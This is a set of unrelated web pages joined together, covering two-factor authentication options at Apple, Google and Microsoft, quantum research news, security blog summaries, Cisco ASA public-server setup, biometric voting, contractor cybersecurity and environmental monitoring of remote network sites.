• Text message sent to a trusted phone number
• Identity verification app: interactive prompt (similar to Google Prompt) delivered to Microsoft Authenticator apps on Windows, Android and iOS
o Previously, Microsoft Account app was used on Android for the same purpose
o Microsoft Authenticator app integrates interactive authentication functionality for Microsoft Accounts with TOTP for third-party accounts
• App-specific passwords
o An email is sent every time the user attempts to sign in from an app or device not supporting two-factor authentication, suggests using app-specific password
o If Microsoft knows such apps or devices are used, an app-specific password will be generated and displayed automatically as the user sets up two-factor authentication for the first time
• Alerts are delivered to trusted emails and phone numbers
• Printable recovery code (for reinstating account access)
Microsoft Account: SIM-Based Authentication
We discussed SIM-based authentication already. Notably, Microsoft does not require the user to configure a trusted phone number. If, however, a trusted phone number is configured, Microsoft will attempt to automatically perform the secondary authentication step when setting up a new Windows 10 Mobile device and restoring it from the OneDrive backup. The company will send a text message to that phone, and the Setup wizard will automatically receive that message and verify sign-in.
Microsoft Account: TOTP
Microsoft supports the time-based one-time password algorithm to generate 6-digit verification codes. Users can add trusted devices by scanning a QR code. Just like Google, Microsoft allows using the same seed on multiple devices, which also means that TOTP-based authenticator apps are not individually revocable. Revoking an authentication app instantly invalidates codes generated by all other authentication apps initialized with that seed.
While Microsoft makes use of the industry-standard implementation that generates a new 6-digit password every 30 seconds, the company’s proprietary Microsoft Authenticator offers a somewhat different experience. Adding a Microsoft Account by signing in (with email and password) as opposed to scanning a QR code results in a new entry that generates 8-digit passwords every 30 seconds. Interestingly, in this scenario a unique seed is used for every Microsoft Authenticator installation; as such, those are individually revocable.
Microsoft Authenticator is available for Android, iOS and Windows 10 platforms, and provides push-based authentication in addition to 6-digit and 8-digit TOTP codes. Interestingly, one can freely choose between using 6-digit and 8-digit TOTP codes at any time to verify Microsoft Account sign-ins.
Microsoft Identity Verification App: Push and TOTP
Microsoft implements push-based authentication prompt via its proprietary Microsoft Authenticator app. Historically, Microsoft offered this authentication experience exclusively on the Android platform via the Microsoft Account app. Ironically, this very functionality was not available on Microsoft’s own mobile operating system, Windows Phone 8.1 and later Windows 10 Mobile.
It was only recently that Microsoft has released a proper Microsoft Authenticator app with an interactive authentication prompt. In this case, it’s a simple “Yes” or “No” prompt with no additional code displayed or required. Each prompt has its own unique identifier allowing the user to see if the request comes from the login session they are trying to authenticate. This type of authentication is server-based. Confirming the request automatically verifies sign-in session.
Interestingly, Microsoft Authenticator operates differently across platforms. Android and iOS devices must be unlocked in order for the user to access the prompt. Windows 10 Mobile devices will display the authentication prompt and allow the user to confirm the request even if the phone is locked. This is one major security issue with Microsoft’s implementation on Windows 10 Mobile smartphones.
Microsoft: App-Specific Passwords
Microsoft offers app-specific passwords. The implementation is similar to Apple’s and Google’s. App-specific passwords consist of 16 lowercase letters, and are individually revocable.
Microsoft sends an email to the user’s registered email address every time it detects an attempt to use Microsoft Account-related services with an app not supporting two-factor authentication. This, for example, includes BlackBerry 10 Hub (built-in email app) as well Microsoft Outlook from older versions of Microsoft Office that use IMAP to access Microsoft email accounts. If the user attempts to sign in from an app or device not supporting two-factor authentication, the company will deliver an email with instructions on how to generate an app-specific password for that app.
Interestingly, Microsoft seems really serious about app-specific passwords; much more so than Google or Apple. If Microsoft knows that the user has active apps or devices accessing Microsoft services and not supporting two-factor authentication, an app-specific password will be generated and displayed automatically as the user sets up two-factor authentication for the first time.
We reviewed two-factor authentication options available on all three major mobile platforms. Apple prefers keeping things inside their closed ecosystem which, in theory, could offer the best security. This is spoiled with one notable exception: Apple requires users verifying at least one trusted phone number, which opens a way for attackers to spoof two-factor authentication by cloning or replacing the victim’s SIM card. Google offers a wide array of authentication options. The insecure SMS/phone call verification is also there, but at least it’s not obligatory. Microsoft offers some very interesting authentication options; insecure delivery methods include trusted email address (Microsoft or non-Microsoft) and SMS/phone calls. In addition, Microsoft’s implementation of cloud-based push is flawed on the company’s very own mobile platform: Windows 10 Mobile devices allow confirming such prompts even if their display is locked. We have no clear winner as each company offers the choice of authentication options catering to their very own audience. | <urn:uuid:26a3ae92-9fe1-4d55-bd5c-8381a62ffef0> | CC-MAIN-2022-40 | https://www.forensicfocus.com/news/exploring-two-factor-authentication/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00365.warc.gz | en | 0.894451 | 8,064 | 2.984375 | 3 |
Quantum Breakthrough Uses Lasers to Find Data in a Giant Cloud of Atomic Nuclei with Particle Encoded with Quantum Information
(ZDNet) Researchers, from the University of Cambridge’s Cavendish Laboratory designed a method to better control the behavior of a cloud of atomic nuclei in which they had injected a single particle encoded with quantum information, also called a quantum bit. This comes with a noise problem: with every nuclei spinning in a different direction within the cloud, it is near-impossible to identify the particle carrying information.
Using laser beams and a single electron, however, the physicists were able to control the spins of the nuclei, restore some order in the cloud, and as a result, detect the existence of the quantum information much easier.
With this new technique, the scientists were able to detect the existence of quantum information as a “flipped quantum bit”, with levels of precision that were high enough to see a single qubit flip in the cloud of nuclei. Now that they have harnessed the potential to control the cloud of nuclei, the researchers said that the next step will be to demonstrate the actual storage and retrieval of a qubit from a quantum dot.
The quantum technology field is concerned with developing ways to send and receive quantum information in the form of qubits. The idea is at the heart of the quantum internet, a project pursued by many countries around the world, which seeks to create a network that will let quantum devices exchange quantum information.
It is one thing to use a quantum dot to store quantum information, but it is another to then find and retrieve the data – and this is where the noisy, messy spin of the atomic nuclei is problematic.
“The solution (…) is to store the fragile quantum information by hiding it in the cloud of 100,000 atomic nuclei that each quantum dot contains, like a needle in a haystack,” said Mete Atatüre, professor at Cambridge’s Cavendish Laboratory, who led the research. “But if we try to communicate with these nuclei like we communicate with bits, they tend to ‘flip’ randomly, creating a noisy system.” | <urn:uuid:bba81103-df2c-46aa-b461-541642296e94> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/quantum-breakthrough-uses-lasers-to-find-data-in-a-giant-cloud-of-atomic-nuclei-with-particle-encoded-with-quantum-information/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00365.warc.gz | en | 0.931904 | 455 | 3.28125 | 3 |
Organizations acquire and store massive amounts of data. Numerous critical business procedures within the organization depend on the accuracy and comprehensiveness of this stored data. There are several ways in which the data’s accuracy can be harmed. If this data is altered or deleted by a third party without authorization, the consequences for the business could be severe, especially if the compromised information was of a sensitive nature. Thus, it is crucial for a company to protect the accuracy of the data it stores by implementing the necessary security measures. This article covers in-depth information about data integrity along with details on its significance, various types, and several techniques that can be used for the preservation and verification of data integrity.
Artificial intelligence is increasingly being used in almost every sector of business and industry globally. The adoption of artificial intelligence in the cybersecurity sector has also been influenced by this rise. The cybersecurity landscape has seen a tremendous shift as a result of AI. In today’s business contexts, there is a significant and quickly expanding surface for cyberattacks. This indicates that more than just human interaction is required for cybersecurity posture analysis and improvement within a company. Since these technologies can quickly analyze millions of data sets and find a wide range of cyber threats, Artificial Intelligence and Machine Learning are now becoming crucial to information security. Nowadays, AI is being included into a wide range of products and applications that are employed in effective threat identification and cyberattack prevention. This article discusses the foundational ideas of artificial intelligence, its function and applications in the field of cybersecurity, and how AI can be applied to enhance an organization’s overall security posture.
Over recent years, data has become one of the most critical assets for the organization. This data can include financial spreadsheets, blueprints on new products, an organization’s trade secrets, private customer information and so much more. Any security incident that can damage or destroy this data can have severe repercussions for the organization and in some cases can cause the organization to become bankrupt. An organization with strong business continuity and disaster recovery planning takes into account all the scenarios that can adversely affect its critical assets. Data backup and recovery mechanisms in an organization, therefore, play a crucial role in the organization’s recovery procedures. This article goes over the importance of data backup and recovery, its types, and the different storage options available to the organization for storing this backup data.
A web application user interacts with it in a variety of ways and can perform different actions depending upon his access restrictions. Most of the time these web applications require users to login in order to perform different actions that only authenticated and authorized users are allowed to perform. HTTP is a stateless protocol that doesn’t maintain user state when he/she performs different actions while using the web application. This meant that the application developers had to come up with a different way in order to maintain the state of the user’s connection with the web application. The use of session IDs and cookies is one such way to maintain this state. However malicious adversaries can employ different tactics to hijack the session of a legitimate user. These types of attacks are called session hijacking attacks. This article goes over the basics of the user session on the application and session hijacking, the types of session hijacking attacks, and the different techniques that can be used to prevent these attacks.
Sysmon is a component of the Microsoft Sysinternals Suite that runs as a kernel driver and may monitor and report on system events. Businesses frequently utilize it as part of their tracking and logging systems.
As discussed in a previous article, while doing a social media OSINT, LinkedIn is one of the places you want to research. Let’s say that you have a first and last name and access to Linkedin. Unfortunately, you can’t look up people on LinkedIn without an account. Is there a way to make OSINT research on LinkedIn without creating a covert account? In this blog page, we will learn how to bypass Linkedin’s credentialing requirements with Google’s mobile-friendly test.
LinkedIn is the most widely used business-related social networking site in the modern world. Before viewing any data, users must first register a free profile on the site. To search for a name, just type the target’s name into the search box and press the enter key. The target’s employer, location, profession, and photo should then appear on the search result. After locating the correct target, clicking the name will take you to that user’s profile. In this article, we’ll look at how to improve our Linkedin people search and how to fine-tune our covert OSINT account settings.
The General Data Protection Regulation (GDPR) came into effect on 25 May 2018. The new set of privacy laws protects the personal data of EU citizens and requires companies to disclose how they handle user information. These new regulations apply to any company that handles the personal data of EU residents, no matter where the company is based. Non-compliance with GDPR can result in hefty fines. The cyber security landscape has changed rapidly over the past few years with an increasing number of cyber attacks and breaches reported almost every day. Companies are also increasingly aware of their responsibilities for protecting customer data as well as other personally identifiable information (PII). This article goes over the importance of this law, how organizations around the world are affected by the law, the rights of data subjects under this law, and how organizations can ensure data protection under this law.
You can use IP addresses to track people across several websites online. You may have IP addresses gathered via online research, email message, or internet connection. Using OSINT, we will explore various methods for obtaining a target’s IP address. We have already covered how to do a simple whois query in a previous blog article. This domain name lookup will provide IP addresses linked with the websites you’re investigating.
Windows logs include a plethora of structured data from many log sources. Event logs capture events that occur during system execution to analyze system activity and troubleshoot faults. This blog article will teach you about common logs and how to examine crucial events in your system. | <urn:uuid:d987eb99-16ea-4193-953b-0787903cd525> | CC-MAIN-2022-40 | https://blog.mosse-institute.com/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00365.warc.gz | en | 0.935221 | 1,261 | 3.203125 | 3 |
Most people are now involved in one or more of the social networking sites that are available online such as Facebook, LinkedIn, MySpace, and Twitter to name a few.
The focus behind social networking is building an online community that shares some common interest. They are mostly web-based and provide a variety of ways to interact such as through your web browser, instant messaging and by email. This isn’t necessarily accessed through your computer, a lot of is now through mobile devices such as iPhones and Blackberries.
Social networking is excellent at reviving old contacts, helping advertise you and your business, and maintaining contacts. It can also be seen as time theft. I would go so far as saying many people even have an addiction that needs to be addressed. There are also risks that need to be considered such as data leakage, identity theft, and virus infections.
Policies should be added regarding your corporations position on social networks as employees may assume that it is authorized without a corporate policy governing acceptable use of the technologies. There are also ways to block access to certain sites through your Internet connection.
One should be careful to ensure these technologies are appropriate for your organization and that the risks do not outweigh the benefits. | <urn:uuid:ff35a0f7-5b34-4d80-a140-f3a54a9a2438> | CC-MAIN-2022-40 | https://davidpapp.com/2009/04/14/social-networking-in-the-corporate-environment/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00365.warc.gz | en | 0.973972 | 247 | 2.546875 | 3 |
This is the second post in my ongoing series on the troubles posed by high-speed signals in the hardware security lab.
What is a High-speed Signal?
Let’s start by defining “high-speed” a bit more formally:
A signal traveling through a conductor is high-speed if transmission line effects are non-negligible.
That’s nice, but what is a transmission line? In simple terms:
A transmission line is a wire of sufficient length that there is nontrivial delay between signal changes from one end of the cable to the other.
You may also see this referred to as the wire being “electrically long.” | <urn:uuid:184f0768-faa8-482c-be4b-1c022f13ec73> | CC-MAIN-2022-40 | https://ioactive.com/probing-and-signal-integrity-fundamentals-for-the-hardware-hacker-part-2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00365.warc.gz | en | 0.947049 | 144 | 3.09375 | 3 |
When you are studying networking in particular you have to deal with a LOT of information. Most people find it difficult to keep track of notes and remember everything when they are studying for an exam. One of the techniques I show to Cisco CCNA students is to use mindmapping. A mindmap is pretty much the same as taking notes but the big difference is that everything is structured. It’s like putting your brain on paper.
A mindmap is a diagram which consists of text, images or relationships between different items. Everything is ordered in a tree-like structure. In the middle of the mindmap you write down your subject. All the topics that have to do with your subject can be written down as a branch of your main subject. Each branch can have multiple branches where the pieces of information are leaves. Mindmaps are great because they show the relationship between different items where notes are just lists…
You can create mindmaps by drawing them yourself or use your computer. I prefer the second method because I can save / print them but also because I’m a faster at typing than writing.
If you want to give it a try take a look at Xmind. It’s free and it’s the mindmapping tool that I like best.
You can download Xmind over here, it’s free:
Once you have installed it and started a new project you can add some items.
You don’t have to use the mouse to add new items, just use ENTER to add a new branch or press INSERT to add a new sub-branch.
Here’s an example I created for CCNA with some of the items, just to give you an impression:
The example above is everything but complete but it should give you an idea. Give mindmapping a try to see if you like it! | <urn:uuid:41029d18-c87a-4081-ab42-a43a4f4ee728> | CC-MAIN-2022-40 | https://networklessons.com/cisco/ccna-routing-switching-icnd1-100-105/how-to-use-mindmapping | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00365.warc.gz | en | 0.949546 | 384 | 2.796875 | 3 |
This document discuss on how to configure a public server using Cisco Adaptive Security Device Manager, ASDM. Public servers are those application servers that are used by the external world to use their resources. A new feature called, Public Server, is introduced from Cisco ASDM software release 6.2 .
There are no specific requirements for this document.
The information in this document is based on these software and hardware versions:
The information in this document was created from the devices in a specific lab environment. All of the devices used in this document started with a cleared (default) configuration. If your network is live, make sure that you understand the potential impact of any command.
Refer to the Cisco Technical Tips Conventions for more information on document conventions.
A web server with internal IP address, 172.16.10.10 is in the DMZ network and should be accessed from the Outside world. You need these items in order to accomplish this:.
But, from Cisco ASDM software release version 6.2 and later, a new wizard for the public server is introduced. From now, you do not need to separately configure the NAT translations and the ACL permits. Instead, you need to specify simple details such as public interface, private interface, public IP address, private address and service.
In this section, you are presented with the information to configure the features described in this document.
Note: Use the Command Lookup Tool (registered customers only) to obtain more information on the commands used in this section.
This document uses this network setup:
Complete these steps in order to configure a public server with the wizard.
Choose Configuration > Firewall > Public servers.
Click Add. Then the Add Public Server window appears.
Now specify these parameters:
Private Interface—The interface to which the real server is connected.
Private IP Address—The real IP address of the server.
Private Service—The actual service that is running on the real server.
Public Interface—The interface through which outside users can access the real server.
Public Address—The IP address that is seen by outside users.
You can view the related configuration entry in the Public Servers pane.
The equivalent CLI configuration is shown here for your reference:
| Cisco ASA
access-list inside_access_in extended permit tcp any host 22.214.171.124 eq www
access-group inside_access_in in interface outside
static (dmz,outside) 126.96.36.199 172.16.10.10 netmask 255.255.255.255
When you use Cisco ASDM version 6.2, you can configure the public server for a static NAT only, but not with a static PAT. It means the public server is accessible at the same service that it is actually exposed to outside world. From Cisco ASDM software release 6.3 and later, support for static NAT with Port Address Translation is available, which means that you can access the public server at a different service to what it is actually exposed.
This is a sample ASDM screen shot of the Add Public Server window for ASDM software release 6.3.
In this case, the public service can be different from the private service. Refer to Static NAT with Port Address Translation for more information.
This feature is exclusively introduced from ASDM perspective for the ease of the Administrator to configure Public Servers. No equivalent new CLI commands are introduced. When you configure a public server using ASDM, the equivalent set of commands for the static and access-list are created automatically and can be viewed in the corresponding ASDM panes. A modification to these entries also result in the modification in the public server entry.
There is currently no verification procedure available for this configuration. | <urn:uuid:51e646ec-229a-4743-be8f-0cb0396c9d2d> | CC-MAIN-2022-40 | https://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/113425-asdm-pub-server-00.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00365.warc.gz | en | 0.878299 | 802 | 2.515625 | 3 |
Over the last years, we have seen revolutionary changes in biometrics. Biometric technology has been implemented in every sector one can imagine, and it is being used to automate the existing processes. One of the major fields where biometric technology has created a huge impact is the government sector. This article will discuss the advantages of using a biometric voting system.
What Is a Biometric Voting System?
Many nations are still having difficulty enrolling and verifying voters. As a result, they’re evaluating the negative impact on their democratic systems. Indeed, during the last ten years, biometric registration and voting technologies have grown in popularity. The goal is to achieve voter equality, founded on the idea of one person, one vote, which states that everyone’s vote should be counted fairly.
In a biometric voting system, the voters are registered based on their unique physical characteristics like fingerprints and even facial or IRIS recognition. Using these biometric characteristics, a person is registered as a voter. Identity theft, voting fraud, and other forms of voter fraud and tampering are targeted by biometric technology. The biometric voting system aims to provide a unique list of voters with zero duplicate voters.
The election is deemed fair in constitutional provisions if it respects the standards of liberty and equality and the confidentiality of voting. It entails, in particular, a duty on the side of the electoral bodies to ensure the fairness of the voting process. All aspects of the election process should be considered, from voter registration to the outcomes of the votes and the electoral activities themselves. The use of biometric technology in electoral processes helps overcome the obstacles of executing the “one citizen, one vote” concept required for democratic, free and transparent elections.
How the Biometric Voting System Works
It is crucial to have a biometric voting system because it promotes fair registration and eventually a better outcome. There are a limited number of ready-to-use Biometric voting systems out there, and TrueVoter™ is a biometric voter registration system for fair and credible elections. Here is how TrueVoter™ works:
The first stage is the enrollment process, where voters’ biometric information is recorded using a biometric device. Depending on the need, it can use a single modality or multiple modalities like a fingerprint, facial, or Iris. The data is managed under a central application.
An advanced search algorithm does a 1:N matching to eradicate any deprecating dates. The duplication process used by TrueVoter™ is the fastest and most advanced system in the world for providing an accurate and fast result.
The final stage is the authentication or adjudication, where a final voter list is provided showing zero duplicate data. This is the most important step toward ensuring a fair and corruption-free election.
Advantages of the Biometric Voting System
You may understand why a country needs a biometric voting system, but apart from eliminating duplicate data, a few more advantages come with the biometric voting system.
The actual democratic process is transparent from start to end with a biometric voting process. Moreover, the framework’s design allows an authority to verify that votes accurately reflect a voter’s aim when casting a ballot.
Many voters bailout of the voting process due to worries about identity theft, as votes could be cast using fake identities. Since the voters are registered with unique biological traits, it is impossible to tamper with them. As voters know that only they can cast their own vote, it will increase participation.
Compared to the old approach to voters registration, the biometric voting system is easily scalable. With the old method, the number of voters grows as the population grows. Adding new voters to the system can be troublesome. On the other hand, adding new voters is user-easy with a biometric voting system, and there is no chance of duplication.
The biometric system allows the right voters to cast votes and eliminate any chance of scams. This allows a fair result and a fair election.
Suppose you are using TrueVoter™ for biometric voter registration. Doing so will ensure strong encryption, fault-tolerant design, disk mirroring, automatic database backups, and disaster recovery options. These are some of the precautions used to preserve citizen privacy.
Sovereign states are increasingly resorting to biometric voting technologies to enable fair, credible elections free of fraud and unlawful behaviors to safeguard democratic ideals. Election integrity is a cornerstone of contemporary democracy since it encourages trust and honesty in elected governments and confidence and faith in elected officials. | <urn:uuid:84c0e525-9f4b-4b39-8610-60c24a3172ed> | CC-MAIN-2022-40 | https://www.m2sys.com/blog/biometric-software/advantages-of-a-biometric-voting-system/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00365.warc.gz | en | 0.916313 | 965 | 2.953125 | 3 |
Rapid changes in the cybersecurity landscape have led to rising pressure on agencies to improve their protection of federal data. Government contractors are especially vulnerable to cyberattacks as hackers target these firms to create widespread disruption across the United States.
Following several cyber incidents targeting critical infrastructure that led to a shutdown of a key US energy pipeline, President Biden released an executive order in May 2021 to improve the nation’s cybersecurity. The order is an initial step toward securing systems used by the federal government, and in the near future, it will likely be required that all private companies that contract with the government follow the same protocol as the agencies.
Companies interested in winning government contracts must stay informed about the latest regulations and threats and implement the proper cyber safeguards to defend and ward against cyber attacks.
What Are The Current Cybersecurity Challenges Surrounding The Public Sector?
The public sector is driven by data since the information it provides is critical to the successful delivery of public services. Unfortunately, the volume and complexity of data has resulted in an uptick in malicious cyberattacks. Some of the most common cybersecurity challenges that currently surround the public sector include the following:
Phishing Attacks On Government Contractors Have Increased
Phishing is a common type of social engineering attack that is used to steal user data, such as credit card numbers and login credentials. This type of attack occurs when a cybercriminal masquerades as a trusted entity and tricks a victim into opening an email or message that contains a malicious link. Clicking the link can lead to the installation of malware. According to a Phishing Susceptibility Report published by PhishMe, about 91 percent of all cyberattacks begin with social engineering.
There Have Been Plenty Of Data Breaches Outside SolarWinds
While there has been a lot of discussion regarding the hacking of SolarWinds’ Orion product, this is not the only data breach that has affected government agencies and the private industry as a whole. According to Statista, the U.S. government accounted for 5.6 percent of all data breaches in the United States in 2019.
Defense Contractors Have Seen Increased Malware And Ransomware Attacks
Aside from phishing, malware and ransomware are some of the most prominent cybersecurity threats to government contractors.
Malware consists of malicious software, such as viruses, adware, spyware and worms that are often transmitted through email attachments, peer-to-peer downloads, misleading websites and phishing attempts. Ransomware is a type of malware used to block access to all or part of a computer system until the victim has paid a sum of money. Contractors have seen a steady increase in both malware and ransomware attacks in the last several years.
What Government Contractors Should Know About Cybersecurity In 2021
Cybersecurity threats continue to grow at a rapid rate and government contractors must keep pace to avoid a costly security breach or data loss. Businesses that want to avoid these risks must understand cybersecurity requirements in 2021 and how they apply to federal contractors. Here are some things that government contractors should know about cybersecurity:
The Internet of Things (IoT) Cybersecurity Improvement Act Was Signed into Law
The IoT Cybersecurity Improvement Act was officially signed into law at the end of 2020. The bipartisan legislation requires any IoT devices purchased with government funds to meet minimum security standards. The Act also addresses supply chain risks to the federal government caused by insecure IoT devices by implementing minimum security requirements.
FedRAMP Authorization Has Increased in Difficulty
The Federal Risk and Authorization Management Program (FedRAMP) is a government program that sets standards for authorizing, assessing and monitoring the security of cloud systems. Despite ongoing improvements to FedRAMP, the program has still shown some difficulties in terms of authorization.
The current authorization process is costly, slow and does not result in sufficient reuse of authorizations. The high costs, combined with long timelines, create a barrier to entry and make it difficult for providers to serve state and local government customers.
There Is Still Uncertainty Surrounding Preparation For CMMC
The Department of Defense (DoD)has recently developed a new certification framework to address certain risks posed by DoD contractors with inadequate cybersecurity controls. The Cybersecurity Maturity Model Certification (CMMC) is modeled after various frameworks but focuses on the NIST Special Publication 800-171. However, there are concerns that there is not enough clarity regarding the certification process, the cost of becoming certified and how the CMMC reciprocates with other cyber standards.
Cybersecurity Laws Are Continuously Evolving
Cybersecurity has been a major concern for both government and private sectors for more than a decade. To protect against new and ongoing threats, cybersecurity laws and regulations are created to help keep sensitive data out of the hands of cybercriminals.
As cybersecurity laws are continuously being enacted, government contractors must keep up-to-date with these changes to ensure compliance.
Speak With Hartman To Keep Up With Changes In Cybersecurity
Cybercriminals are growing increasingly sophisticated with their methods and the number of data breaches across the United States continues to rise. It is more important than ever for government contractors to strengthen their cybersecurity posture to win contracts and maintain compliance. For more information on how to address cybersecurity concerns and develop a strategy to prevent attacks, reach out to our experienced risk management consultants at Hartman Executive Advisors today. | <urn:uuid:9301bf58-a5c9-427d-ba8a-72764b4b9853> | CC-MAIN-2022-40 | https://hartmanadvisors.com/top-cybersecurity-concerns-for-government-contractors/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00565.warc.gz | en | 0.945196 | 1,086 | 2.796875 | 3 |
One of the most important ways to reduce your network vulnerability is by implementing a remote monitoring system that can report environment conditions. This is especially critical if your remote sites are located within areas that can be brought down by factors, such as high temperature, humidity, flooding, fire and etc.
Since we have been providing environmental monitoring solutions for more than 30 years, it is important for us to let you know that deploying an effective system does not have to be a hassle. If you follow simple best practices you can protect your network and your investment.
There's nothing compared to the peace of mind of knowing whenever your network equipment is in danger - before small, preventable problems become bigger issues.
When keeping an eye on the mission-critical equipment at your remote sites, it's critical to make sure that your monitoring system supports the following capabilities:
When putting together a remote system to monitor your environmental conditions, the first thing you need to do is choosing an adequate sensor for each condition you want to monitor.
There are basically two different types of sensors that you could select from: analog and discrete.
Discrete sensors can only output information as an on or off indication. Think about the thermostat at your house, on it you can specify a determined degree that will separate an acceptable temperature from an unacceptable temperature.
On the other hand, analog sensors are usually way more preferable for use in environmental monitoring systems. They will provide you with a much higher level of detail than a discrete sensor. Analog sensors will let you know, for example, exactly how cold or how hot it is at your sites (normally within 1 degree and within the specified minimum and maximum temperatures measurable by the sensor).
So, with an analog sensor, you will be able to monitor the environmental situation of your sites at all times by simply checking the current conditions.
Commonly measured via analog input are:
Battery, rectifier, and generator voltages
Wind speed and direction
Since you probably can't always be watching a sensor, make sure that your environmental system is also capable of sending you notifications when critical thresholds are crossed. You should, at least, ne able to configure two thresholds. This will give you a good foundation for environmental monitoring, as you will be able to set up an alert for "major over" ("too hot" for example) and another for "major under" ("too cold" for example).
Better environmental systems, however, will provide support for additional thresholds, so you can set up both "major" and "minor" severities on both sides of your ideal range.
Depending on which environmental aspect you want to monitor, you should look for an environmental monitoring system with four-threshold analog inputs - this should include live monitoring of real-time levels.
Environmental monitoring, as the name suggests, means any monitoring of the physical environment around your network equipment and servers. It is different of direct equipment monitoring, which involves only equipment failures and problems not related to any adverse environmental conditions around your equipment.
A large variety of unfavorable conditions can affect and take down your expensive infrastructure, and this is especially true at very remote locations such as a top of a mountain. Since your remote sites are so distant, it's even more important to implement a competent environmental monitoring system. Your remote facilities are unmanned and this means that you will need an automated system to monitor the critical environmental levels surrounding your mission-critical equipment.
Temperature is probably the most commonly monitored environmental level in both telecom and IT worlds. High temperatures are usually considered the biggest threat as all computer gear naturally generates large amounts of heat. If this heat is not reduced through venting or HVAC systems, then your equipment can be damaged or - at least - suffer a thermal shutdown that will lead to an interruption in service.
Temperature, however, is only one of many environmental factors that you need to monitor. Make sure that your environmental monitoring system monitors all your remote site environmental conditions. This includes humidity, flooding, power and even site security.
Humidity monitoring, for example, is critical in climates where relative humidity can rise to nearly 100% of air's capacity to hold moisture. When the humidity in a site exceeds acceptable levels for the equipment deployed there (normally anything over 90% will cause trouble for most of the devices), your ability to keep your network online reduces considerably.
Excess humidity can cause the internal pieces of your gear to rust and degrade, possibly leading to short-circuiting. Too low humidity levels can make your equipment prone to static electricity, which can also shorten your equipment. That's why it is critical that you maintain humidity at moderate levels.
The quality of your environmental monitoring system will enhance the overall efficiency of your network. By choosing the right humidity meter, you will instantly protect your equipment. With so many different selections available in the market, it might be difficult to choose the right options for your business. Make sure your humidity monitor supports the following capabilities:
24x7 system access
Customized alarm notifications (by text, email, voice call, and etc)
Adequate sensor coverage
Advanced battery support for individual humidity sensors
Integrated monitoring technologies
Another example of an environmental condition is floor water. Floor water is similar to humidity but a lot more dangerous. If you have a leak that lets in rain water or seasonal flooding at your sites, a floor water sensor should give you important intelligence about which sites have puddles of water on their floors.
An efficient floor water sensor would have about 4 metal contacts on its underside. These make contact with the floor. If a puddle of water connects any of these contacts (about 2 inches apart), the sensor will detect a small current flowing between the contacts (water is, of course, a good conductor if electricity).
Keep in mind that, different from monitoring temperature or humidity, there really is no reason to use an analog floor water sensor. It all comes down to your floor either has water on it or it doesn't.
However, if you face extreme cases where semi-regular flooding is expected and equipment racks have been installed above a certain minimum height, then you could use a float sensor to determine flood water levels. In this specific scenario, monitoring rising water would give you the required alert that your equipment is about to go underwater.
The primary damage caused by a power outage is, of course, the network downtime that happens when your site go dark. Network downtime leads to lost revenue and frustrated customers or end-users.
That is why you need to have complete visibility of your remote site power supplies.
Make sure your remote system is able to monitor everything - commercial power availability, battery voltage levels, rectifiers, generators, and generator fuel levels. Also, your environmental monitoring system should tell you when the power has dropped below or surged above a set threshold. It should notify you or the correct techs when a problem has occurred.
Your expensive, mission-critical equipment is kept in nondescript equipment huts or at unmanned remote sites. Your facilities or remote sites face the risk of vandalism and theft every day, simply because of their distant location, little to no human presence, and minimal security deterrents.
So, monitoring unauthorized entry to your remote facilities protects your network and protect your investments. Security monitoring normally includes door sensors, motion sensors and IP cameras.
Make sure you are getting the most bang for your buck, when purchasing a facility access remote monitoring system, be sure it:
It's hard enough to maintain a single monitoring system. Do you have two? Do you have more than two?
There are many different reasons why you may have two or more incompatible systems. Older equipment normally accumulates itself in layers, with different systems being used to monitor different parts of the network. Or if your company has acquired another network, you may now be responsible for two different, incompatible networks.
However, you can't view your environmental conditions separately from your entire network. Therefore, look for an environmental monitoring system that can monitor your mission-critical gear, such as switches, routers, and microwave radios.
Integration is the best way for working with diverse network monitoring systems. Some of the benefits you can achieve by integrating your isolated remote monitoring systems are:
Your integrated system should be able to send you notifications by email and text messages, but it also should feature web browser access - for all your alarms from all your equipment.
You might think that integration is a hard task to accomplish, that it is too complicated to be done effectively, but you need to know that thanks to advances in software and protocol conversion make it easier than ever to integrate incompatible systems.
So, before you commit to buying monitoring equipment, make sure it will support your integration strategy.
Environmental conditions monitoring can be easily overlooked during the design of network alarm monitoring systems.
To have proper visibility over your mission-critical equipment deployed at remote sites, you need to accurate information about every element involved with your gear. This means keeping an eye not only on your base equipment, but also on all the equipment that supports it and, of course, the environmental conditions that all your equipment requires to function properly.
We have many clients starting with their very first monitoring project and they don't quite know yet all that they could and should monitor. So, to help them make informed decisions and have better network efficiency, we've put together the Fundamentals of a Network Alarm Monitoring System white paper.
This white paper will serve as a guide to give you information about how to implement an alarm monitoring system in your network. You'll learn what equipment you must monitor, how to design an alarm system that will meet your current and future requirements, and how to minimize transition costs.
Download your free PDF copy of the Fundamentals of a Network Alarm Monitoring System and protect your network with a perfect-fit solution.
You need to see DPS gear in action. Get a live demo with our engineers.
Have a specific question? Ask our team of expert engineers and get a specific answer!
Sign up for the next DPS Factory Training!
